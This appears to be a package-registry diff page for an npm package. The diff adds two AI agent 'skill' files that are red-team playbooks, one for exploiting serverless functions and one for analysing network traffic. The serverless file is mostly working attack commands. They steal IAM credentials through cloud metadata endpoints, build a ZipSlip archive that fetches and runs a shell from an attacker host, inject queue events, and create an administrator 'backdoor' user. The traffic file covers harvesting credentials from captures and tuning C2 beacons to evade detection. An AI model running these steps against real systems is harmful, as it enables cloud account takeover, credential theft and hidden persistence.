npm - rtexit-method - Versions diffs - 0.1.5 → 0.1.7 - Mend

rtexit-method 0.1.5 → 0.1.7

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (12) hide show

package/packaged-assets/.agents/skills/rt-serverless/SKILL.md ADDED Viewed

@@ -0,0 +1,274 @@
+---
+name: rt-serverless
+description: "Serverless function exploitation skill for authorized engagements. AWS Lambda privilege escalation and data exfiltration, Azure Functions abuse, GCP Cloud Functions exploitation, environment variable extraction from serverless contexts, event injection attacks (S3 trigger, SQS, SNS), function URL misconfiguration, cold start timing attacks, shared filesystem abuse, and lateral movement from serverless to cloud account. Use when engagement scope includes cloud-native or serverless architectures."
+---
+# rt-serverless — Serverless Function Exploitation
+## Overview
+Serverless functions (Lambda, Azure Functions, Cloud Functions) have a unique attack surface: they run with IAM roles, have environment variables containing secrets, share underlying infrastructure, and are triggered by cloud events that attackers can inject into. A misconfigured Lambda can be the pivot from an external vulnerability to full cloud account takeover.
+---
+## Phase 1 — Discovery & Enumeration
+```bash
+# AWS Lambda enumeration
+aws lambda list-functions --region us-east-1
+aws lambda get-function --function-name target-function
+# Shows: code location (S3 URL), environment variables (if you have IAM rights), role
+# Download function code
+aws lambda get-function --function-name target-function \
+  --query 'Code.Location' --output text | xargs curl -o function.zip
+unzip function.zip -d function_code/
+# Analyze code for: hardcoded creds, SQL queries, internal endpoints
+# Get function policy (who can invoke it)
+aws lambda get-policy --function-name target-function
+# If Resource: "*" → publicly invokable
+# List function URLs (direct HTTPS invocation without IAM)
+aws lambda list-function-url-configs --function-name target-function
+# AuthType: NONE = unauthenticated invoke = high risk
+# Azure Functions enumeration
+az functionapp list --output table
+az functionapp function list --name FUNCTION_APP --resource-group RG
+# GCP Cloud Functions
+gcloud functions list
+gcloud functions describe FUNCTION_NAME --region us-central1
+```
+---
+## Phase 2 — Unauthenticated Function Invocation
+```bash
+# Lambda Function URLs with AuthType: NONE
+curl https://RANDOM_ID.lambda-url.us-east-1.on.aws/
+# Lambda with resource policy allowing public invoke
+aws lambda invoke --function-name target-function \
+  --payload '{"action":"admin","user":"attacker"}' \
+  --cli-binary-format raw-in-base64-out output.json
+cat output.json
+# Azure Function with anonymous auth level
+curl "https://FUNCTIONAPP.azurewebsites.net/api/FUNCTION_NAME"
+# Or with function key:
+curl "https://FUNCTIONAPP.azurewebsites.net/api/FUNCTION_NAME?code=FUNCTION_KEY"
+# Find function keys (often in source code, CI/CD, or Azure Portal)
+az functionapp function keys list --name FUNCTIONAPP --resource-group RG --function-name FUNC
+# GCP unauthenticated function
+curl "https://REGION-PROJECT.cloudfunctions.net/FUNCTION_NAME"
+# allUsers with invoker role = public
+gcloud functions get-iam-policy FUNCTION_NAME
+```
+---
+## Phase 3 — Environment Variable Extraction
+```bash
+# Lambda environment variables often contain:
+# - Database credentials
+# - API keys (Stripe, Twilio, SendGrid)
+# - JWT signing secrets
+# - Internal service URLs
+# - AWS credentials for other services
+# Extract env vars if you have lambda:GetFunction
+aws lambda get-function-configuration --function-name target-function \
+  | jq '.Environment.Variables'
+# Output:
+# {
+#   "DB_PASSWORD": "secretpassword",
+#   "STRIPE_API_KEY": "sk_live_...",
+#   "INTERNAL_API_KEY": "abc123"
+# }
+# From inside function execution (SSRF → Lambda metadata)
+# If the function is vulnerable to SSRF:
+curl "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
+# Or Lambda-specific endpoint:
+curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
+# Returns temporary credentials for the function's IAM role
+# If you have code execution inside function:
+# Process environment dump
+import os
+print(dict(os.environ))
+# All env vars including AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN
+```
+---
+## Phase 4 — Event Injection Attacks
+```bash
+# Functions triggered by cloud events — inject malicious events
+# S3 trigger: function processes files uploaded to S3 bucket
+# If you have S3 write access → upload malicious file → trigger function
+# Upload file that causes path traversal in function
+aws s3 cp malicious.csv s3://trigger-bucket/uploads/../../etc/passwd
+# Upload ZIP that causes ZipSlip in function
+python3 << 'EOF'
+import zipfile
+with zipfile.ZipFile("zipslip.zip", "w") as z:
+    z.writestr("../../tmp/pwned.sh", "#!/bin/bash\ncurl http://ATTACKER/shell.sh | bash")
+EOF
+aws s3 cp zipslip.zip s3://trigger-bucket/uploads/
+# SQS injection: function processes SQS messages
+aws sqs send-message \
+  --queue-url https://sqs.us-east-1.amazonaws.com/ACCOUNT/queue-name \
+  --message-body '{"action":"admin_override","user_id":"1","admin":true}'
+# SNS injection
+aws sns publish \
+  --topic-arn arn:aws:sns:us-east-1:ACCOUNT:topic-name \
+  --message '{"type":"webhook","url":"http://169.254.169.254/latest/meta-data/"}'
+# API Gateway → Lambda injection
+# Standard web attacks (SQLi, XSS, SSRF) via HTTP
+curl "https://API_ID.execute-api.us-east-1.amazonaws.com/prod/user?id=1' OR '1'='1"
+```
+---
+## Phase 5 — IAM Role Abuse from Lambda
+```bash
+# Lambda functions have an IAM execution role
+# Over-privileged roles → lateral movement to other AWS services
+# From inside function (or via SSRF):
+# Get temporary credentials
+curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
+# Response:
+# {
+#   "AccessKeyId": "ASIA...",
+#   "SecretAccessKey": "...",
+#   "Token": "...",
+#   "Expiration": "2024-..."
+# }
+# Use credentials to escalate
+export AWS_ACCESS_KEY_ID="ASIA..."
+export AWS_SECRET_ACCESS_KEY="..."
+export AWS_SESSION_TOKEN="..."
+# Check what the role can do
+aws sts get-caller-identity
+aws iam list-attached-role-policies --role-name lambda-execution-role
+aws iam get-role-policy --role-name lambda-execution-role --policy-name inline-policy
+# Common over-privilege patterns:
+aws s3 ls --recursive  # s3:* = read all buckets
+aws secretsmanager list-secrets  # All secrets
+aws ssm describe-parameters  # All SSM parameters (contain creds)
+aws ec2 describe-instances  # Internal infrastructure map
+# Best case: iam:* → full account takeover
+aws iam create-user --user-name backdoor
+aws iam attach-user-policy --user-name backdoor \
+  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
+aws iam create-access-key --user-name backdoor
+```
+---
+## Phase 6 — Shared Filesystem & Cold Start Attacks
+```bash
+# /tmp in Lambda is shared across warm instances (same account, same function)
+# Write to /tmp → next warm invocation reads it
+# Test for shared /tmp abuse
+# Invoke 1: write marker
+curl -X POST FUNCTION_URL -d '{"action":"write","path":"/tmp/marker","content":"pwned"}'
+# Invoke 2: read marker
+curl -X POST FUNCTION_URL -d '{"action":"read","path":"/tmp/marker"}'
+# If response = "pwned" → /tmp shared across invocations
+# Lambda Layer abuse
+# Layers are shared code across functions
+# If you can modify a layer: aws lambda publish-layer-version
+# All functions using that layer execute your code
+# Cold start timing attack
+# Functions have initialization code that runs once
+# If init code is slow → cold start takes longer → timing reveals code paths
+# Measure cold start time
+python3 << 'EOF'
+import requests, time
+# Force cold start by changing something
+for _ in range(5):
+    start = time.time()
+    r = requests.post(FUNCTION_URL, json={"probe": True})
+    elapsed = time.time() - start
+    print(f"Response time: {elapsed:.3f}s | Status: {r.status_code}")
+    time.sleep(0.1)
+# Long first response = cold start = leaked initialization info
+EOF
+```
+---
+## Phase 7 — Azure Functions & GCP Specific
+```bash
+# Azure Functions — Managed Identity abuse
+# Functions with Managed Identity can access Azure resources
+# From inside Azure function (SSRF to IMDS):
+curl "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2019-08-01&resource=https://management.azure.com/" \
+  -H "Metadata: true"
+# Returns access token for the function's managed identity
+# Use token to access Azure resources
+TOKEN=$(curl -s "http://..." -H "Metadata: true" | jq -r '.access_token')
+curl -H "Authorization: Bearer $TOKEN" \
+  "https://management.azure.com/subscriptions?api-version=2020-01-01"
+# GCP Cloud Functions — Service Account abuse
+curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
+  -H "Metadata-Flavor: Google"
+# Returns access token for the function's service account
+TOKEN=$(curl -s "http://..." -H "Metadata-Flavor: Google" | python3 -c "import json,sys; print(json.load(sys.stdin)['access_token'])")
+curl -H "Authorization: Bearer $TOKEN" \
+  "https://cloudresourcemanager.googleapis.com/v1/projects"
+```
+---
+## Skill Levels
+**BEGINNER:** Lambda function enumeration + download code + check env vars + unauthenticated invoke
+**INTERMEDIATE:** Event injection via S3/SQS + IAM role credential extraction via IMDS SSRF + Secrets Manager dump
+**ADVANCED:** Lambda layer modification for persistence + shared /tmp abuse + managed identity chaining
+**EXPERT:** Custom event injection chains + cross-function lateral movement + serverless-to-EC2 pivot via over-privileged role
+---
+## References
+- Pacu (AWS exploitation): https://github.com/RhinoSecurityLabs/pacu
+- Lambda security research: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
+- Serverless Goat (lab): https://github.com/OWASP/Serverless-Goat
+- MITRE T1648: https://attack.mitre.org/techniques/T1648/

package/packaged-assets/.agents/skills/rt-traffic-analysis/SKILL.md ADDED Viewed

@@ -0,0 +1,283 @@
+---
+name: rt-traffic-analysis
+description: "Network traffic capture and analysis skill for authorized engagements. Wireshark capture filters and display filters, tcpdump workflows, credential extraction from pcap files, protocol identification, C2 traffic analysis, TLS fingerprinting (JA3/JA3S), detecting lateral movement in packet captures, and automated pcap analysis with NetworkMiner and Zeek. Use when analyzing captured network traffic, verifying C2 traffic profile, or investigating network-level evidence."
+---
+# rt-traffic-analysis — Network Traffic Capture & Analysis
+## Overview
+Traffic analysis in red teaming serves two purposes: finding credentials and sensitive data in captured traffic, and verifying that your own C2 traffic blends in and avoids detection signatures.
+---
+## Phase 1 — Capture Setup
+```bash
+# tcpdump — command line capture
+# Capture all traffic on interface
+tcpdump -i eth0 -w capture.pcap
+# Capture specific host
+tcpdump -i eth0 host 10.10.10.50 -w target.pcap
+# Capture specific port range
+tcpdump -i eth0 'port 80 or port 443 or port 8080' -w web.pcap
+# Capture credentials (unencrypted protocols)
+tcpdump -i eth0 'port 21 or port 23 or port 110 or port 143 or port 25' -w cleartext.pcap
+# 21=FTP, 23=Telnet, 110=POP3, 143=IMAP, 25=SMTP
+# Capture from remote host (pipe over SSH)
+ssh user@PIVOT_HOST "tcpdump -i eth0 -w - 'not port 22'" | wireshark -k -i -
+# Promiscuous mode (capture all traffic on segment)
+tcpdump -i eth0 -p  # -p = don't use promiscuous (default on)
+ip link set eth0 promisc on  # Enable promiscuous
+```
+---
+## Phase 2 — Wireshark Filters
+```bash
+# Credential extraction filters
+# HTTP POST requests (login forms)
+http.request.method == "POST"
+# HTTP basic auth
+http.authorization
+# FTP credentials
+ftp.request.command == "PASS" or ftp.request.command == "USER"
+# Telnet (capture stream)
+telnet
+# SMTP auth
+smtp.auth
+# NTLM authentication (all protocols)
+ntlmssp
+# Kerberos
+kerberos
+# DNS queries (C2 detection / data exfiltration detection)
+dns
+# Long DNS queries (possible DNS tunneling)
+dns.qry.name.len > 50
+# SMB file access
+smb2.cmd == 5  # SMB2 Read
+# Key display filters
+ip.addr == 10.10.10.50                    # Traffic to/from specific host
+ip.src == 10.10.10.0/24                   # From subnet
+tcp.port == 4444                          # Specific port (C2 detection)
+frame.len > 1400                          # Large packets
+tcp.flags.syn == 1 && tcp.flags.ack == 0  # SYN scan detection
+http.response.code == 200                 # Successful HTTP responses
+ssl.handshake.type == 1                   # TLS Client Hello
+```
+---
+## Phase 3 — Automated Credential Extraction
+```bash
+# NetworkMiner — GUI tool, auto-extracts credentials from pcap
+# https://www.netresec.com/?page=NetworkMiner
+mono NetworkMiner.exe capture.pcap
+# Credentials tab → all extracted usernames/passwords
+# PCredz — automated credential extraction
+git clone https://github.com/lgandx/PCredz
+python3 PCredz.py -f capture.pcap
+# Extracts: HTTP Basic, FTP, Telnet, POP3, IMAP, SNMP community strings, NTLMv1/v2
+# Dsniff tools
+dsniff -p capture.pcap       # Extract passwords from pcap
+urlsnarf -p capture.pcap     # Extract URLs
+msgsnarf -p capture.pcap     # IM/chat messages
+mailsnarf -p capture.pcap    # Email contents
+# Extract HTTP credentials with tshark
+tshark -r capture.pcap -Y "http.request.method==POST" \
+  -T fields -e http.host -e http.request.uri -e urlencoded-form.value
+# Extract all HTTP request bodies
+tshark -r capture.pcap -Y "http" -T fields \
+  -e ip.src -e ip.dst -e http.request.method \
+  -e http.request.uri -e http.file_data
+# NTLM hash extraction
+tshark -r capture.pcap -Y "ntlmssp.auth" -T fields \
+  -e ntlmssp.auth.username -e ntlmssp.auth.domain \
+  -e ntlmssp.ntlmserverchallenge -e ntlmssp.auth.ntresponse
+```
+---
+## Phase 4 — TLS Fingerprinting (JA3/JA3S)
+```bash
+# JA3 fingerprints identify TLS clients (browsers, malware, tools)
+# JA3S fingerprints identify TLS servers
+# Use to: verify your C2 traffic, detect blue team tools, identify malware
+# Install ja3
+pip3 install pyja3
+python3 << 'EOF'
+import pyshark
+cap = pyshark.FileCapture('capture.pcap', display_filter='ssl.handshake.type==1')
+for pkt in cap:
+    try:
+        ja3 = pkt.ssl.handshake_type
+        print(f"Src: {pkt.ip.src} → JA3: {pkt.ssl.ja3}")
+    except: pass
+EOF
+# Compare against known JA3 databases
+# https://ja3er.com/
+# Cobalt Strike default JA3: 72a7c4f3d7c7cdbf3f8b1c1e9dbf3c1f (well-known, blocked)
+# → Use malleable profile to change JA3
+# tshark JA3 extraction
+tshark -r capture.pcap -Y "tls.handshake.type==1" \
+  -T fields -e ip.src -e tls.handshake.ja3
+```
+---
+## Phase 5 — C2 Traffic Verification
+```bash
+# Before engagement: verify your own C2 traffic blends in
+# Capture your beacon traffic → analyze for detection signatures
+# Check beacon interval regularity (beacons are too regular = detectable)
+python3 << 'EOF'
+from scapy.all import rdpcap, IP
+import statistics
+pkts = rdpcap("c2_traffic.pcap")
+times = [p.time for p in pkts if IP in p and p[IP].dst == "C2_IP"]
+intervals = [times[i+1]-times[i] for i in range(len(times)-1)]
+print(f"Mean interval: {statistics.mean(intervals):.2f}s")
+print(f"Std deviation: {statistics.stdev(intervals):.2f}s")
+# Low stdev = too regular → increase jitter in C2 profile
+EOF
+# Check packet sizes (uniform sizes = suspicious)
+tshark -r c2_traffic.pcap -T fields -e frame.len | sort | uniq -c | sort -rn | head -10
+# All same size = suspicious → add padding in malleable profile
+# Check DNS query frequency
+tshark -r c2_traffic.pcap -Y dns -T fields -e dns.qry.name | \
+  awk '{print $1}' | sort | uniq -c | sort -rn | head -20
+# Unusual subdomains or high frequency = DNS C2 signature
+```
+---
+## Phase 6 — Zeek (Bro) Analysis
+```bash
+# Zeek generates structured logs from pcap — easier to query than raw pcap
+apt install zeek -y
+# Analyze pcap
+zeek -r capture.pcap
+ls *.log
+# conn.log = all connections
+# http.log = HTTP requests
+# dns.log = DNS queries
+# ssl.log = TLS connections
+# files.log = transferred files
+# weird.log = protocol anomalies
+# Find C2 beacons (regular connections)
+cat conn.log | zeek-cut id.orig_h id.resp_h id.resp_p duration | \
+  awk '$4 < 1' | sort | uniq -c | sort -rn | head -20
+# Regular short connections to same host = beacon pattern
+# DNS tunneling detection
+cat dns.log | zeek-cut query | awk '{print length($1), $1}' | \
+  sort -rn | head -20 | awk '$1 > 50'
+# Long DNS queries = tunneling
+# Data exfiltration detection
+cat conn.log | zeek-cut id.orig_h id.resp_h orig_bytes | \
+  sort -k3 -rn | head -10
+# Large outbound transfers
+# HTTP user-agent analysis
+cat http.log | zeek-cut user_agent | sort | uniq -c | sort -rn
+# Unusual user agents = custom tools
+```
+---
+## Phase 7 — Protocol Identification
+```bash
+# Identify unknown protocols in captures
+# Wireshark: Analyze → Decode As → try different protocols
+# tshark protocol summary
+tshark -r capture.pcap -q -z io,phs
+# Shows protocol hierarchy
+# Find non-standard ports with known protocols
+tshark -r capture.pcap -q -z conv,tcp | head -20
+# Port 4444, 8888 etc = likely C2
+# ngrep — grep through packet payloads
+ngrep -q -I capture.pcap "password|secret|token" tcp
+# strings on pcap
+strings capture.pcap | grep -iE "password|api_key|secret|token|Authorization"
+# Identify binary protocols by magic bytes
+python3 << 'EOF'
+from scapy.all import rdpcap, Raw
+pkts = rdpcap("capture.pcap")
+for pkt in pkts:
+    if Raw in pkt:
+        payload = bytes(pkt[Raw])
+        if payload[:2] == b'\x4d\x5a':
+            print("PE executable in traffic!")
+        elif payload[:4] == b'\x50\x4b\x03\x04':
+            print("ZIP file in traffic!")
+        elif b'JFIF' in payload[:20] or b'\xff\xd8\xff' == payload[:3]:
+            print("JPEG in traffic!")
+EOF
+```
+---
+## Skill Levels
+**BEGINNER:** tcpdump capture + Wireshark display filters for credentials · PCredz automated extraction
+**INTERMEDIATE:** JA3 fingerprinting + C2 traffic profiling · Zeek analysis + DNS tunneling detection
+**ADVANCED:** Custom Zeek scripts for behavioral analysis · Beacon interval analysis + jitter verification
+**EXPERT:** ML-based traffic classification · Custom protocol dissectors · Full traffic replay and modification
+---
+## References
+- Wireshark display filters: https://wiki.wireshark.org/DisplayFilters
+- PCredz: https://github.com/lgandx/PCredz
+- Zeek: https://zeek.org
+- JA3: https://github.com/salesforce/ja3
+- MITRE T1040: https://attack.mitre.org/techniques/T1040/